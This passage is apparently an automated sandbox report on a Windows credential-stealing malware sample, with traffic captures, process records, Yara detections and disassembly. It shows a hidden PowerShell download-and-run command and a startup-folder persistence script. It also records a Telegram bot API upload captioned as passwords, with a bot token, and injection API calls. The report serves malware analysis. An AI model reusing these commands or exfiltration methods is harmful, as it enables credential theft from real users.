                                                                                                2025-01-16 07:31:09 UTC8000INData Raw: 31 c5 c5 26 58 66 f6 1b 1c 08 d3 5f c9 a8 8c dc 6d fb cd 74 34 eb e6 23 94 ea 9b c6 4b e5 38 a3 79 bb a9 42 e4 32 a8 26 15 45 9a e6 28 d6 5d 27 3f be 4e b6 8b 5b c6 15 aa 80 af 34 b3 23 0a d6 b7 25 e1 83 af 61 14 27 db 01 12 3a b1 02 22 ac 84 ff dd a8 1d aa ab a8 00 dd cc c3 b2 57 ee 56 4e b2 51 f8 67 a1 c9 ad 6e 27 37 e3 68 f8 d9 41 70 f2 e9 fd fb eb 4a c5 ab 54 89 ac 79 e3 73 b7 b1 e5 f4 96 c4 f1 c3 4e 8b 41 aa ff 0d b4 54 d7 fe ff 80 a9 27 7d 63 17 9b fa 65 c4 db 1e 40 43 2d 76 14 02 bd da d2 50 dc 10 f5 43 a0 7e aa b7 64 65 b6 aa 6a 7e cf 9e fb d1 1e 3a 8c f2 55 ff 0b ab 6d eb 35 77 ff 38 b1 25 05 73 27 d0 67 af a1 e1 b2 93 e5 4c 0b 8b f0 f3 37 d8 e4 b7 27 aa ef b4 01 1a da b6 21 4c 80 e7 f8 67 71 1a 8f 88 0a f8 d1 ce 82 37 d8 84 c6 40 2a e3 ee 8d 57
                                                                                                Data Ascii: 1&Xf_mt4#K8yB2&E(]'?N[4#%a':"WVNQgn'7hApJTysNAT'}ce@C-vPC~dej~:Um5w8%s'gL7'!Lgq7@*W
                                                                                                2025-01-16 07:31:09 UTC8000INData Raw: e7 e6 d7 ae c2 52 07 82 88 4f 2c 2e 56 f4 83 13 4a 9b 93 65 e6 3f 0b 17 25 1a 18 f8 ea ea 23 27 88 33 fc 0e 88 da fa 2d 6f db a6 b6 e2 af ed 61 6f 70 1a 60 f6 d4 7e 99 ab 4d 3a 4d 86 07 6a 94 f8 88 e3 8c 1e 46 08 b6 61 d8 c7 5a f1 29 ed 56 63 74 9b de 8a eb 65 4b 6b 67 62 5d 20 c4 f8 6a 12 e3 a2 ab 39 27 e0 6b f8 fd 4c 8f 21 91 e5 13 c8 92 ca 13 bb 50 e2 64 a6 59 e6 c3 1e 90 e9 22 50 6f 6e 89 7e 18 b0 da 14 8c 2f bb 86 c0 ea 0a d1 b9 0b 27 f3 60 bf 5f f0 19 9e a6 a3 2d bf 03 b6 8a 03 ea 2f c2 52 64 e4 2a 8a 8b d8 65 11 42 da 13 02 eb 5a f2 d4 e8 82 dc b0 49 a6 9b 17 c7 b9 71 a3 75 28 8d d9 0f ee df 04 c6 29 3c e3 41 13 a7 88 7d a3 62 4d fe 84 ea 37 68 49 d9 44 92 57 bb 62 f1 14 d5 b8 bb 11 86 65 e0 5f 2e b4 e4 c1 64 63 c4 59 53 e2 58 f6 4e d8 af c4 ab e3
                                                                                                Data Ascii: RO,.VJe?%#'3-oaop`~M:MjFaZ)VcteKkgb] j9'kL!PdY"Pon~/'`_-/Rd*eBZIqu()<A}bM7hIDWbe_.dcYSXN
                                                                                                2025-01-16 07:31:09 UTC8000INData Raw: f8 f6 56 91 fc 7f ff a0 60 3c 1d ca 48 d9 1d b0 4c 28 34 70 fd 1d 75 55 d4 89 ea 23 6d c6 de da 13 37 5d d3 d8 fb ef a7 6d ae 8e 75 85 99 f5 7a 8b 9b 0e f3 ae 66 13 33 55 be f7 44 ca ee b3 47 be 07 59 09 f4 36 2c c1 d0 63 d7 e5 ee e4 86 e9 51 65 b2 5b 16 70 ba 34 6d d9 bb e7 bc bd 25 74 e7 76 45 85 ab 52 8e 2e 4c 6d b3 85 08 3c 6e fb 52 19 4a d7 92 86 f3 3b c2 39 99 72 87 63 dd 39 9d 46 96 eb ac b9 bb 39 ec 34 ca 3a 27 e3 f8 b8 7b bb f9 73 b1 12 4d cc d8 d8 12 2b cc 21 69 84 6e 48 0e 26 39 73 84 dd 2a 00 8a fb f1 f9 0a 31 06 cb 7e 45 63 df f2 05 41 59 a2 24 74 39 0f 04 65 f2 5c ef 61 c6 a6 b0 c2 3c 0b 5b e1 1d bc ad 44 b7 b2 7c ff b4 bc 2f 0f 7d a2 65 75 64 1c 2e 27 c9 d7 6d 0c 31 6d f7 ae 7d f1 33 bf f6 25 9b 5f 01 79 6a 84 bc 6b a4 1b a7 13 8d 43 5e 51
                                                                                                Data Ascii: V`<HL(4puU#m7]muzf3UDGY6,cQe[p4m%tvER.Lm<nRJ;9rc9F94:'{sM+!inH&9s*1~EcAY$t9e\a<[D|/}eud.'m1m}3%_yjkC^Q
                                                                                                2025-01-16 07:31:09 UTC8000INData Raw: 9f e5 29 a6 af 33 ed 62 60 73 13 9c f3 24 1f 5f 78 aa 0c 04 b3 f3 e2 ef 09 4a 10 77 b3 54 ae c5 86 ba 4a 89 3b be 81 9d cc 71 e2 98 b8 d1 5c 34 04 f2 b7 0e 71 d8 cd db e1 33 3f 99 f1 65 8b 01 e1 a8 f9 5a 83 59 ec 66 e7 f8 63 4f e8 2d 38 aa 91 fb d5 65 25 7a 40 0a 93 bb f7 15 62 af 4b 9b f8 52 99 1a 23 a9 a3 49 7c 6e c5 d1 9b 32 96 2b f7 55 5a df 10 11 8c 4f 36 ff bf 81 fd d7 6e f5 bb 3d 3c 11 a9 51 87 98 88 46 e8 fa cc 8e 89 e1 7b db 0f 9e 9a 24 51 80 4e 25 c8 1a 3d 95 4d 1c 56 dc 31 ee b9 c3 2b 65 bb 08 12 bc d5 3b 18 6b b2 b3 ca 2c 01 00 60 2b 4f 8a ed f1 f9 1d 04 66 c6 c9 c9 31 e5 6c d7 1e 64 18 b0 8d 41 e0 13 3a ac 8e 58 a2 13 4f 7f d1 55 da e5 4f 9e b0 eb 62 36 67 d8 bb 2e 57 71 49 31 38 05 04 6c 70 57 b5 49 be 9e 19 e4 9e a0 d4 62 10 f5 7f b8 bc e0
                                                                                                Data Ascii: )3b`s$_xJwTJ;q\4q3?eZYfcO-8e%z@bKR#I|n2+UZO6n=<QF{$QN%=MV1+e;k,`+Of1ldA:XOUOb6g.WqI18lpWIb


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.549936104.21.96.14435712C:\Users\user\AppData\Roaming\TypeId.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-16 07:31:23 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                Connection: Keep-Alive
                                                                                                2025-01-16 07:31:24 UTC861INHTTP/1.1 200 OK
                                                                                                Date: Thu, 16 Jan 2025 07:31:23 GMT
                                                                                                Content-Type: text/xml
                                                                                                Content-Length: 362
                                                                                                Connection: close
                                                                                                Age: 2327473
                                                                                                Cache-Control: max-age=31536000
                                                                                                cf-cache-status: HIT
                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xf6xniV%2Bq0McbpwhC%2Frd4M7O0cdsnB9X01UqolLzYAKBthtI%2B5aADjpc4Sa74MdPPrjht%2B2NIK6s%2F4XczSCxx6LD4IUTt3fERqfDcuWb%2FsIN0uBspQYc8qrRjjpkUlKvZBY3xOgd"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 902c67dadc0fc32e-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1494&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1908496&cwnd=178&unsent_bytes=0&cid=db0a534d8a03cba9&ts=183&x=0"
                                                                                                2025-01-16 07:31:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.549976149.154.167.2204435712C:\Users\user\AppData\Roaming\TypeId.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-16 07:31:30 UTC296OUTPOST /bot7666772215:AAG3oWDDhgYedd4yOneZp0AStrhY_tgTlTc/sendDocument?chat_id=5830304904&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                Content-Type: multipart/form-data; boundary================8dd35d5e1b5622d
                                                                                                Host: api.telegram.org
                                                                                                Content-Length: 1088
                                                                                                Connection: Keep-Alive
                                                                                                2025-01-16 07:31:30 UTC1088OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 64 35 65 31 62 35 36 32 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                Data Ascii: --===============8dd35d5e1b5622dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                2025-01-16 07:31:30 UTC388INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0
                                                                                                Date: Thu, 16 Jan 2025 07:31:30 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 570
                                                                                                Connection: close
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                2025-01-16 07:31:30 UTC570INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 36 36 37 37 32 32 31 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 52 75 73 73 69 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 6f 6c 69 63 65 72 65 70 6f 72 74 65 72 73 32 30 32 35 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 38 33 30 33 30 34 39 30 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 65 6c 65 6e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 69 66 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 77 77 77 77 77 77 32 32 32 32 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33
                                                                                                Data Ascii: {"ok":true,"result":{"message_id":351,"from":{"id":7666772215,"is_bot":true,"first_name":"N Russia","username":"Policereporters2025bot"},"chat":{"id":5830304904,"first_name":"Helen","last_name":"Gif","username":"wwwwwww222222","type":"private"},"date":173


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:1
                                                                                                Start time:02:30:35
                                                                                                Start date:16/01/2025
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:2
                                                                                                Start time:02:30:35
                                                                                                Start date:16/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:02:30:40
                                                                                                Start date:16/01/2025
                                                                                                Path:C:\Users\user\AppData\Local\Temp\file.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\file.exe"
                                                                                                Imagebase:0x6b0000
                                                                                                File size:188'928 bytes
                                                                                                MD5 hash:83E93539D82C1A0DB8E7564F2665911C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2281972613.000000000297C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2314157262.0000000006860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:6
                                                                                                Start time:02:30:54
                                                                                                Start date:16/01/2025
                                                                                                Path:C:\Users\user\AppData\Local\Temp\file.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\file.exe"
                                                                                                Imagebase:0x160000
                                                                                                File size:188'928 bytes
                                                                                                MD5 hash:83E93539D82C1A0DB8E7564F2665911C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4559068186.0000000002529000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4559068186.0000000002529000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4559068186.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:7
                                                                                                Start time:02:31:06
                                                                                                Start date:16/01/2025
                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs"
                                                                                                Imagebase:0x7ff774610000
                                                                                                File size:170'496 bytes
                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:8
                                                                                                Start time:02:31:06
                                                                                                Start date:16/01/2025
                                                                                                Path:C:\Users\user\AppData\Roaming\TypeId.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Roaming\TypeId.exe"
                                                                                                Imagebase:0x90000
                                                                                                File size:188'928 bytes
                                                                                                MD5 hash:83E93539D82C1A0DB8E7564F2665911C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.2547706995.000000000241C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:10
                                                                                                Start time:02:31:21
                                                                                                Start date:16/01/2025
                                                                                                Path:C:\Users\user\AppData\Roaming\TypeId.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Roaming\TypeId.exe"
                                                                                                Imagebase:0x670000
                                                                                                File size:188'928 bytes
                                                                                                MD5 hash:83E93539D82C1A0DB8E7564F2665911C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.4558808915.00000000028AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.4558808915.00000000028AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Executed Functions

                                                                                                  Function 00007FF848F33605 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2154970197.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_7ff848f30000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                  • Instruction ID: 8cd79de6276827636de12d65a3168a067b77cb9a69eb1c7cf293fb48c1f9526b
                                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                  • Instruction Fuzzy Hash: F001677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:9.1%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:6.4%
                                                                                                  Total number of Nodes:141
                                                                                                  Total number of Limit Nodes:7
                                                                                                  execution_graph 19767 59d8498 19768 59d84e6 NtProtectVirtualMemory 19767->19768 19770 59d8530 19768->19770 19771 59d1498 19772 59d14ad 19771->19772 19780 59d14d7 19772->19780 19784 59d14e8 19772->19784 19788 59d1809 19772->19788 19792 59d1813 19772->19792 19796 59d1940 19772->19796 19800 59d1957 19772->19800 19773 59d14cf 19782 59d14e8 19780->19782 19781 59d16a2 19781->19773 19782->19781 19804 59d1c69 19782->19804 19786 59d1515 19784->19786 19785 59d16a2 19785->19773 19786->19785 19787 59d1c69 10 API calls 19786->19787 19787->19786 19790 59d1553 19788->19790 19789 59d16a2 19789->19773 19790->19789 19791 59d1c69 10 API calls 19790->19791 19791->19790 19794 59d1553 19792->19794 19793 59d16a2 19793->19773 19794->19793 19795 59d1c69 10 API calls 19794->19795 19795->19794 19798 59d1553 19796->19798 19797 59d16a2 19797->19773 19798->19797 19799 59d1c69 10 API calls 19798->19799 19799->19798 19801 59d1553 19800->19801 19802 59d16a2 19801->19802 19803 59d1c69 10 API calls 19801->19803 19802->19773 19803->19801 19805 59d1c7d 19804->19805 19806 59d1c9f 19805->19806 19818 59d24b7 19805->19818 19823 59d2318 19805->19823 19828 59d29e2 19805->19828 19833 59d1f60 19805->19833 19838 59d1b01 19805->19838 19843 59d20a1 19805->19843 19848 59d24ce 19805->19848 19853 59d226e 19805->19853 19858 59d2433 19805->19858 19863 59d2170 19805->19863 19868 59d2930 19805->19868 19806->19782 19819 59d24c1 19818->19819 19873 59db538 19819->19873 19877 59db533 19819->19877 19820 59d2738 19824 59d2327 19823->19824 19881 59daf98 19824->19881 19885 59daf90 19824->19885 19825 59d1d92 19829 59d1d92 19828->19829 19830 59d2956 19828->19830 19889 59dbdc8 19830->19889 19893 59dbdc0 19830->19893 19834 59d1f78 19833->19834 19897 59d3588 19834->19897 19902 59d3578 19834->19902 19835 59d1f90 19839 59d20a2 19838->19839 19947 59db7a8 19839->19947 19951 59db7b0 19839->19951 19840 59d214c 19840->19806 19844 59d20b0 19843->19844 19846 59db7a8 WriteProcessMemory 19844->19846 19847 59db7b0 WriteProcessMemory 19844->19847 19845 59d214c 19845->19806 19846->19845 19847->19845 19849 59d24dd 19848->19849 19851 59daf98 Wow64SetThreadContext 19849->19851 19852 59daf90 Wow64SetThreadContext 19849->19852 19850 59d250c 19851->19850 19852->19850 19854 59d2280 19853->19854 19856 59db7a8 WriteProcessMemory 19854->19856 19857 59db7b0 WriteProcessMemory 19854->19857 19855 59d1d92 19856->19855 19857->19855 19859 59d1d92 19858->19859 19860 59d2b3b 19858->19860 19861 59db538 VirtualAllocEx 19860->19861 19862 59db533 VirtualAllocEx 19860->19862 19861->19859 19862->19859 19864 59d217f 19863->19864 19866 59db7a8 WriteProcessMemory 19864->19866 19867 59db7b0 WriteProcessMemory 19864->19867 19865 59d1d92 19866->19865 19867->19865 19869 59d293a 19868->19869 19871 59dbdc8 NtResumeThread 19869->19871 19872 59dbdc0 NtResumeThread 19869->19872 19870 59d1d92 19871->19870 19872->19870 19874 59db578 VirtualAllocEx 19873->19874 19876 59db5b5 19874->19876 19876->19820 19878 59db578 VirtualAllocEx 19877->19878 19880 59db5b5 19878->19880 19880->19820 19882 59dafdd Wow64SetThreadContext 19881->19882 19884 59db025 19882->19884 19884->19825 19886 59dafdd Wow64SetThreadContext 19885->19886 19888 59db025 19886->19888 19888->19825 19890 59dbe10 NtResumeThread 19889->19890 19892 59dbe45 19890->19892 19892->19829 19894 59dbe10 NtResumeThread 19893->19894 19896 59dbe45 19894->19896 19896->19829 19898 59d359f 19897->19898 19899 59d35c1 19898->19899 19907 59d39e5 19898->19907 19916 59d3966 19898->19916 19899->19835 19903 59d3588 19902->19903 19904 59d35c1 19903->19904 19905 59d39e5 2 API calls 19903->19905 19906 59d3966 2 API calls 19903->19906 19904->19835 19905->19904 19906->19904 19908 59d3a0d 19907->19908 19925 59d8d19 19908->19925 19930 59d8d70 19908->19930 19934 59d8d60 19908->19934 19909 59d3ee3 19938 59d8e95 19909->19938 19943 59d8ea0 19909->19943 19917 59d396c 19916->19917 19920 59d8d19 CreateProcessA 19917->19920 19921 59d8d70 CreateProcessA 19917->19921 19922 59d8d60 CreateProcessA 19917->19922 19918 59d3ee3 19923 59d8e95 CreateProcessA 19918->19923 19924 59d8ea0 CreateProcessA 19918->19924 19919 59d3f22 19920->19918 19921->19918 19922->19918 19923->19919 19924->19919 19926 59d8d68 19925->19926 19927 59d8d26 19925->19927 19928 59d8d9a 19926->19928 19929 59d8e95 CreateProcessA 19926->19929 19927->19909 19928->19909 19929->19928 19931 59d8d87 19930->19931 19932 59d8d9a 19931->19932 19933 59d8e95 CreateProcessA 19931->19933 19932->19909 19933->19932 19935 59d8d70 19934->19935 19936 59d8d9a 19935->19936 19937 59d8e95 CreateProcessA 19935->19937 19936->19909 19937->19936 19939 59d3f22 19938->19939 19940 59d8e9f CreateProcessA 19938->19940 19942 59d908c 19940->19942 19944 59d8f04 CreateProcessA 19943->19944 19946 59d908c 19944->19946 19948 59db7f8 WriteProcessMemory 19947->19948 19950 59db84f 19948->19950 19950->19840 19952 59db7f8 WriteProcessMemory 19951->19952 19954 59db84f 19952->19954 19954->19840

                                                                                                  Executed Functions

                                                                                                  Function 0280E710 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 280e710-280e731 1 280e733 0->1 2 280e738-280e81f 0->2 1->2 4 280ef21-280ef49 2->4 5 280e825-280e966 call 280ad20 2->5 8 280f64f-280f658 4->8 51 280eeea-280ef14 5->51 52 280e96c-280e9c7 5->52 10 280ef57-280ef61 8->10 11 280f65e-280f675 8->11 12 280ef63 10->12 13 280ef68-280f05c call 280ad20 10->13 12->13 34 280f086 13->34 35 280f05e-280f06a 13->35 38 280f08c-280f0ac 34->38 36 280f074-280f07a 35->36 37 280f06c-280f072 35->37 40 280f084 36->40 37->40 42 280f10c-280f18c 38->42 43 280f0ae-280f107 38->43 40->38 63 280f1e3-280f226 call 280ad20 42->63 64 280f18e-280f1e1 42->64 55 280f64c 43->55 65 280ef16 51->65 66 280ef1e 51->66 60 280e9c9 52->60 61 280e9cc-280e9d7 52->61 55->8 60->61 62 280edff-280ee05 61->62 67 280ee0b-280ee87 call 280199c 62->67 68 280e9dc-280e9fa 62->68 95 280f231-280f23a 63->95 64->95 65->66 66->4 108 280eed4-280eeda 67->108 70 280ea51-280ea66 68->70 71 280e9fc-280ea00 68->71 76 280ea68 70->76 77 280ea6d-280ea83 70->77 71->70 74 280ea02-280ea0d 71->74 80 280ea43-280ea49 74->80 76->77 78 280ea85 77->78 79 280ea8a-280eaa1 77->79 78->79 84 280eaa3 79->84 85 280eaa8-280eabe 79->85 86 280ea4b-280ea4c 80->86 87 280ea0f-280ea13 80->87 84->85 91 280eac0 85->91 92 280eac5-280eacc 85->92 94 280eacf-280eb3a 86->94 89 280ea15 87->89 90 280ea19-280ea31 87->90 89->90 97 280ea33 90->97 98 280ea38-280ea40 90->98 91->92 92->94 99 280eb3c-280eb48 94->99 100 280eb4e-280ed03 94->100 96 280f29a-280f2a9 95->96 102 280f2ab-280f333 96->102 103 280f23c-280f264 96->103 97->98 98->80 99->100 110 280ed05-280ed09 100->110 111 280ed67-280ed7c 100->111 138 280f4ac-280f4b8 102->138 104 280f266 103->104 105 280f26b-280f294 103->105 104->105 105->96 113 280ee89-280eed1 108->113 114 280eedc-280eee2 108->114 110->111 117 280ed0b-280ed1a 110->117 115 280ed83-280eda4 111->115 116 280ed7e 111->116 113->108 114->51 119 280eda6 115->119 120 280edab-280edca 115->120 116->115 118 280ed59-280ed5f 117->118 123 280ed61-280ed62 118->123 124 280ed1c-280ed20 118->124 119->120 126 280edd1-280edf1 120->126 127 280edcc 120->127 132 280edfc 123->132 128 280ed22-280ed26 124->128 129 280ed2a-280ed4b 124->129 130 280edf3 126->130 131 280edf8 126->131 127->126 128->129 134 280ed52-280ed56 129->134 135 280ed4d 129->135 130->131 131->132 132->62 134->118 135->134 140 280f338-280f341 138->140 141 280f4be-280f519 138->141 142 280f343 140->142 143 280f34a-280f4a0 140->143 156 